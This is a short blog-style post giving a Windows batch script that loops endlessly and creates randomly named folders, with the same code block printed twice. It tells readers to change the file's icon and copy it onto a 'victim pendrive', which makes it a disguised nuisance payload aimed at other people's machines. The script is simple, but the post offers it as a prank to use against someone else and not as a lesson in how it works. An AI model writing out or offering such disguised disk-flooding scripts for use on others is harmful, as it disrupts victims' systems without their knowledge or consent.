How to create many folder in second
1. How to create more than 3,000 folders under a minute:
1) Open your notepad and type
the following code.
@echo off
:top
md %random%
goto top
2) Save it as anything.bat
1) Open your notepad and type
the following code.
@echo off
:top
md %random%
goto top
2) Save it as anything.bat
Ex- rahul.bat etc..
And change the icon as you wnt.
Save it to your pendrive or your victim pendrive.....
No comments :
Post a Comment